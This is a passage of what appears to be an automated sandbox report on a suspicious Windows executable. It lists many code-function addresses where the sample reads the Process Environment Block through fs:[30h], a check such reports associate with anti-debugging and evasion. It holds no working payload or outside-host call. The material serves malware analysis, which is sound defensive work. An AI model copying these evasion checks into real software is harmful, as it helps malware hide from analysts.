        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732670 mov eax, dword ptr fs:[00000030h]3_2_37732670
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376E7662 mov eax, dword ptr fs:[00000030h]3_2_376E7662
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376E7662 mov eax, dword ptr fs:[00000030h]3_2_376E7662
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376E7662 mov eax, dword ptr fs:[00000030h]3_2_376E7662
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37703660 mov eax, dword ptr fs:[00000030h]3_2_37703660
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37703660 mov eax, dword ptr fs:[00000030h]3_2_37703660
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37703660 mov eax, dword ptr fs:[00000030h]3_2_37703660
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777166E mov eax, dword ptr fs:[00000030h]3_2_3777166E
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777166E mov eax, dword ptr fs:[00000030h]3_2_3777166E
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777166E mov eax, dword ptr fs:[00000030h]3_2_3777166E
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F0670 mov eax, dword ptr fs:[00000030h]3_2_376F0670
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772666D mov esi, dword ptr fs:[00000030h]3_2_3772666D
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772666D mov eax, dword ptr fs:[00000030h]3_2_3772666D
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772666D mov eax, dword ptr fs:[00000030h]3_2_3772666D
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376ED64A mov eax, dword ptr fs:[00000030h]3_2_376ED64A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376ED64A mov eax, dword ptr fs:[00000030h]3_2_376ED64A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37725654 mov eax, dword ptr fs:[00000030h]3_2_37725654
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772265C mov eax, dword ptr fs:[00000030h]3_2_3772265C
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772265C mov ecx, dword ptr fs:[00000030h]3_2_3772265C
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772265C mov eax, dword ptr fs:[00000030h]3_2_3772265C
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F3640 mov eax, dword ptr fs:[00000030h]3_2_376F3640
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770F640 mov eax, dword ptr fs:[00000030h]3_2_3770F640
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770F640 mov eax, dword ptr fs:[00000030h]3_2_3770F640
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770F640 mov eax, dword ptr fs:[00000030h]3_2_3770F640
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772C640 mov eax, dword ptr fs:[00000030h]3_2_3772C640
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772C640 mov eax, dword ptr fs:[00000030h]3_2_3772C640
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F965A mov eax, dword ptr fs:[00000030h]3_2_376F965A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F965A mov eax, dword ptr fs:[00000030h]3_2_376F965A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37720630 mov eax, dword ptr fs:[00000030h]3_2_37720630
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37778633 mov esi, dword ptr fs:[00000030h]3_2_37778633
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37778633 mov eax, dword ptr fs:[00000030h]3_2_37778633
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37778633 mov eax, dword ptr fs:[00000030h]3_2_37778633
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F5622 mov eax, dword ptr fs:[00000030h]3_2_376F5622
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F5622 mov eax, dword ptr fs:[00000030h]3_2_376F5622
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772F63F mov eax, dword ptr fs:[00000030h]3_2_3772F63F
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772F63F mov eax, dword ptr fs:[00000030h]3_2_3772F63F
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772C620 mov eax, dword ptr fs:[00000030h]3_2_3772C620
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3779D62C mov ecx, dword ptr fs:[00000030h]3_2_3779D62C
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3779D62C mov ecx, dword ptr fs:[00000030h]3_2_3779D62C
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3779D62C mov eax, dword ptr fs:[00000030h]3_2_3779D62C
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F0630 mov eax, dword ptr fs:[00000030h]3_2_376F0630
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37783608 mov eax, dword ptr fs:[00000030h]3_2_37783608
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37783608 mov eax, dword ptr fs:[00000030h]3_2_37783608
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37783608 mov eax, dword ptr fs:[00000030h]3_2_37783608
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37783608 mov eax, dword ptr fs:[00000030h]3_2_37783608
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37783608 mov eax, dword ptr fs:[00000030h]3_2_37783608
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37783608 mov eax, dword ptr fs:[00000030h]3_2_37783608
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771D600 mov eax, dword ptr fs:[00000030h]3_2_3771D600
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771D600 mov eax, dword ptr fs:[00000030h]3_2_3771D600
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377AF607 mov eax, dword ptr fs:[00000030h]3_2_377AF607
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772360F mov eax, dword ptr fs:[00000030h]3_2_3772360F
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3776C6F2 mov eax, dword ptr fs:[00000030h]3_2_3776C6F2
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3776C6F2 mov eax, dword ptr fs:[00000030h]3_2_3776C6F2
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376E96E0 mov eax, dword ptr fs:[00000030h]3_2_376E96E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376E96E0 mov eax, dword ptr fs:[00000030h]3_2_376E96E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FC6E0 mov eax, dword ptr fs:[00000030h]3_2_376FC6E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F56E0 mov eax, dword ptr fs:[00000030h]3_2_376F56E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F56E0 mov eax, dword ptr fs:[00000030h]3_2_376F56E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F56E0 mov eax, dword ptr fs:[00000030h]3_2_376F56E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377166E0 mov eax, dword ptr fs:[00000030h]3_2_377166E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377166E0 mov eax, dword ptr fs:[00000030h]3_2_377166E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F06CF mov eax, dword ptr fs:[00000030h]3_2_376F06CF
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771D6D0 mov eax, dword ptr fs:[00000030h]3_2_3771D6D0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377BA6C0 mov eax, dword ptr fs:[00000030h]3_2_377BA6C0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377986C2 mov eax, dword ptr fs:[00000030h]3_2_377986C2
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377B86A8 mov eax, dword ptr fs:[00000030h]3_2_377B86A8
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377B86A8 mov eax, dword ptr fs:[00000030h]3_2_377B86A8
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777C691 mov eax, dword ptr fs:[00000030h]3_2_3777C691
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3776D69D mov eax, dword ptr fs:[00000030h]3_2_3776D69D
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37700680 mov eax, dword ptr fs:[00000030h]3_2_37700680
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37700680 mov eax, dword ptr fs:[00000030h]3_2_37700680
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37700680 mov eax, dword ptr fs:[00000030h]3_2_37700680
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37700680 mov eax, dword ptr fs:[00000030h]3_2_37700680
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37700680 mov eax, dword ptr fs:[00000030h]3_2_37700680
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37700680 mov eax, dword ptr fs:[00000030h]3_2_37700680
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37700680 mov eax, dword ptr fs:[00000030h]3_2_37700680
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37700680 mov eax, dword ptr fs:[00000030h]3_2_37700680
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37700680 mov eax, dword ptr fs:[00000030h]3_2_37700680
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37700680 mov eax, dword ptr fs:[00000030h]3_2_37700680
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37700680 mov eax, dword ptr fs:[00000030h]3_2_37700680
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37700680 mov eax, dword ptr fs:[00000030h]3_2_37700680
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377AF68C mov eax, dword ptr fs:[00000030h]3_2_377AF68C
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F8690 mov eax, dword ptr fs:[00000030h]3_2_376F8690
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770C560 mov eax, dword ptr fs:[00000030h]3_2_3770C560
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37779567 mov eax, dword ptr fs:[00000030h]3_2_37779567
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377CB55F mov eax, dword ptr fs:[00000030h]3_2_377CB55F
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377CB55F mov eax, dword ptr fs:[00000030h]3_2_377CB55F
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F254C mov eax, dword ptr fs:[00000030h]3_2_376F254C
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377BA553 mov eax, dword ptr fs:[00000030h]3_2_377BA553
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37726540 mov eax, dword ptr fs:[00000030h]3_2_37726540
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37728540 mov eax, dword ptr fs:[00000030h]3_2_37728540
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770E547 mov eax, dword ptr fs:[00000030h]3_2_3770E547
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732539 mov eax, dword ptr fs:[00000030h]3_2_37732539
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376E753F mov eax, dword ptr fs:[00000030h]3_2_376E753F
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376E753F mov eax, dword ptr fs:[00000030h]3_2_376E753F
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376E753F mov eax, dword ptr fs:[00000030h]3_2_376E753F
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772F523 mov eax, dword ptr fs:[00000030h]3_2_3772F523
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37721527 mov eax, dword ptr fs:[00000030h]3_2_37721527
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F3536 mov eax, dword ptr fs:[00000030h]3_2_376F3536
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F3536 mov eax, dword ptr fs:[00000030h]3_2_376F3536
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770252B mov eax, dword ptr fs:[00000030h]3_2_3770252B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770252B mov eax, dword ptr fs:[00000030h]3_2_3770252B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770252B mov eax, dword ptr fs:[00000030h]3_2_3770252B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770252B mov eax, dword ptr fs:[00000030h]3_2_3770252B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770252B mov eax, dword ptr fs:[00000030h]3_2_3770252B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770252B mov eax, dword ptr fs:[00000030h]3_2_3770252B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770252B mov eax, dword ptr fs:[00000030h]3_2_3770252B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3779F51B mov eax, dword ptr fs:[00000030h]3_2_3779F51B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3779F51B mov eax, dword ptr fs:[00000030h]3_2_3779F51B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3779F51B mov eax, dword ptr fs:[00000030h]3_2_3779F51B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3779F51B mov eax, dword ptr fs:[00000030h]3_2_3779F51B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3779F51B mov eax, dword ptr fs:[00000030h]3_2_3779F51B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3779F51B mov eax, dword ptr fs:[00000030h]3_2_3779F51B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3779F51B mov ecx, dword ptr fs:[00000030h]3_2_3779F51B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3779F51B mov ecx, dword ptr fs:[00000030h]3_2_3779F51B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3779F51B mov eax, dword ptr fs:[00000030h]3_2_3779F51B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3779F51B mov eax, dword ptr fs:[00000030h]3_2_3779F51B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3779F51B mov eax, dword ptr fs:[00000030h]3_2_3779F51B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3779F51B mov eax, dword ptr fs:[00000030h]3_2_3779F51B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3779F51B mov eax, dword ptr fs:[00000030h]3_2_3779F51B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37711514 mov eax, dword ptr fs:[00000030h]3_2_37711514
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37711514 mov eax, dword ptr fs:[00000030h]3_2_37711514
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37711514 mov eax, dword ptr fs:[00000030h]3_2_37711514
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37711514 mov eax, dword ptr fs:[00000030h]3_2_37711514
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37711514 mov eax, dword ptr fs:[00000030h]3_2_37711514
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37711514 mov eax, dword ptr fs:[00000030h]3_2_37711514
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777C51D mov eax, dword ptr fs:[00000030h]3_2_3777C51D
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EB502 mov eax, dword ptr fs:[00000030h]3_2_376EB502
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F2500 mov eax, dword ptr fs:[00000030h]3_2_376F2500
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771E507 mov eax, dword ptr fs:[00000030h]3_2_3771E507
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771E507 mov eax, dword ptr fs:[00000030h]3_2_3771E507
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771E507 mov eax, dword ptr fs:[00000030h]3_2_3771E507
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771E507 mov eax, dword ptr fs:[00000030h]3_2_3771E507
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771E507 mov eax, dword ptr fs:[00000030h]3_2_3771E507
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771E507 mov eax, dword ptr fs:[00000030h]3_2_3771E507
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771E507 mov eax, dword ptr fs:[00000030h]3_2_3771E507
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771E507 mov eax, dword ptr fs:[00000030h]3_2_3771E507
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772C50D mov eax, dword ptr fs:[00000030h]3_2_3772C50D
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772C50D mov eax, dword ptr fs:[00000030h]3_2_3772C50D
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777C5FC mov eax, dword ptr fs:[00000030h]3_2_3777C5FC
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FB5E0 mov eax, dword ptr fs:[00000030h]3_2_376FB5E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FB5E0 mov eax, dword ptr fs:[00000030h]3_2_376FB5E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FB5E0 mov eax, dword ptr fs:[00000030h]3_2_376FB5E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FB5E0 mov eax, dword ptr fs:[00000030h]3_2_376FB5E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FB5E0 mov eax, dword ptr fs:[00000030h]3_2_376FB5E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FB5E0 mov eax, dword ptr fs:[00000030h]3_2_376FB5E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772A5E7 mov ebx, dword ptr fs:[00000030h]3_2_3772A5E7
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772A5E7 mov eax, dword ptr fs:[00000030h]3_2_3772A5E7
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377755E0 mov eax, dword ptr fs:[00000030h]3_2_377755E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377215EF mov eax, dword ptr fs:[00000030h]3_2_377215EF
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377265D0 mov eax, dword ptr fs:[00000030h]3_2_377265D0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF5C7 mov eax, dword ptr fs:[00000030h]3_2_376EF5C7
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF5C7 mov eax, dword ptr fs:[00000030h]3_2_376EF5C7
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF5C7 mov eax, dword ptr fs:[00000030h]3_2_376EF5C7
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF5C7 mov eax, dword ptr fs:[00000030h]3_2_376EF5C7
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF5C7 mov eax, dword ptr fs:[00000030h]3_2_376EF5C7
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF5C7 mov eax, dword ptr fs:[00000030h]3_2_376EF5C7
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF5C7 mov eax, dword ptr fs:[00000030h]3_2_376EF5C7
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF5C7 mov eax, dword ptr fs:[00000030h]3_2_376EF5C7
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF5C7 mov eax, dword ptr fs:[00000030h]3_2_376EF5C7
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377705C6 mov eax, dword ptr fs:[00000030h]3_2_377705C6
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772C5C6 mov eax, dword ptr fs:[00000030h]3_2_3772C5C6
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377785AA mov eax, dword ptr fs:[00000030h]3_2_377785AA
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F45B0 mov eax, dword ptr fs:[00000030h]3_2_376F45B0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F45B0 mov eax, dword ptr fs:[00000030h]3_2_376F45B0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777C592 mov eax, dword ptr fs:[00000030h]3_2_3777C592
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37722594 mov eax, dword ptr fs:[00000030h]3_2_37722594
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37797591 mov edi, dword ptr fs:[00000030h]3_2_37797591
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772A580 mov eax, dword ptr fs:[00000030h]3_2_3772A580
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772A580 mov eax, dword ptr fs:[00000030h]3_2_3772A580
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37729580 mov eax, dword ptr fs:[00000030h]3_2_37729580
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37729580 mov eax, dword ptr fs:[00000030h]3_2_37729580
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377AF582 mov eax, dword ptr fs:[00000030h]3_2_377AF582
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3776E588 mov eax, dword ptr fs:[00000030h]3_2_3776E588
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3776E588 mov eax, dword ptr fs:[00000030h]3_2_3776E588
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377AF478 mov eax, dword ptr fs:[00000030h]3_2_377AF478
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F8470 mov eax, dword ptr fs:[00000030h]3_2_376F8470
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F8470 mov eax, dword ptr fs:[00000030h]3_2_376F8470
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377BA464 mov eax, dword ptr fs:[00000030h]3_2_377BA464
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772D450 mov eax, dword ptr fs:[00000030h]3_2_3772D450
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772D450 mov eax, dword ptr fs:[00000030h]3_2_3772D450
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771E45E mov eax, dword ptr fs:[00000030h]3_2_3771E45E
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771E45E mov eax, dword ptr fs:[00000030h]3_2_3771E45E
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771E45E mov eax, dword ptr fs:[00000030h]3_2_3771E45E
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771E45E mov eax, dword ptr fs:[00000030h]3_2_3771E45E
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771E45E mov eax, dword ptr fs:[00000030h]3_2_3771E45E
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37770443 mov eax, dword ptr fs:[00000030h]3_2_37770443
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37700445 mov eax, dword ptr fs:[00000030h]3_2_37700445
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37700445 mov eax, dword ptr fs:[00000030h]3_2_37700445
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37700445 mov eax, dword ptr fs:[00000030h]3_2_37700445
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37700445 mov eax, dword ptr fs:[00000030h]3_2_37700445
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37700445 mov eax, dword ptr fs:[00000030h]3_2_37700445
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37700445 mov eax, dword ptr fs:[00000030h]3_2_37700445
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FD454 mov eax, dword ptr fs:[00000030h]3_2_376FD454
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FD454 mov eax, dword ptr fs:[00000030h]3_2_376FD454
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FD454 mov eax, dword ptr fs:[00000030h]3_2_376FD454
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FD454 mov eax, dword ptr fs:[00000030h]3_2_376FD454
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FD454 mov eax, dword ptr fs:[00000030h]3_2_376FD454
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FD454 mov eax, dword ptr fs:[00000030h]3_2_376FD454
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EB420 mov eax, dword ptr fs:[00000030h]3_2_376EB420
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37727425 mov eax, dword ptr fs:[00000030h]3_2_37727425
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37727425 mov ecx, dword ptr fs:[00000030h]3_2_37727425
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777F42F mov eax, dword ptr fs:[00000030h]3_2_3777F42F
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777F42F mov eax, dword ptr fs:[00000030h]3_2_3777F42F
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777F42F mov eax, dword ptr fs:[00000030h]3_2_3777F42F
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777F42F mov eax, dword ptr fs:[00000030h]3_2_3777F42F
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777F42F mov eax, dword ptr fs:[00000030h]3_2_3777F42F
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37779429 mov eax, dword ptr fs:[00000030h]3_2_37779429
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376E640D mov eax, dword ptr fs:[00000030h]3_2_376E640D
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377AF409 mov eax, dword ptr fs:[00000030h]3_2_377AF409
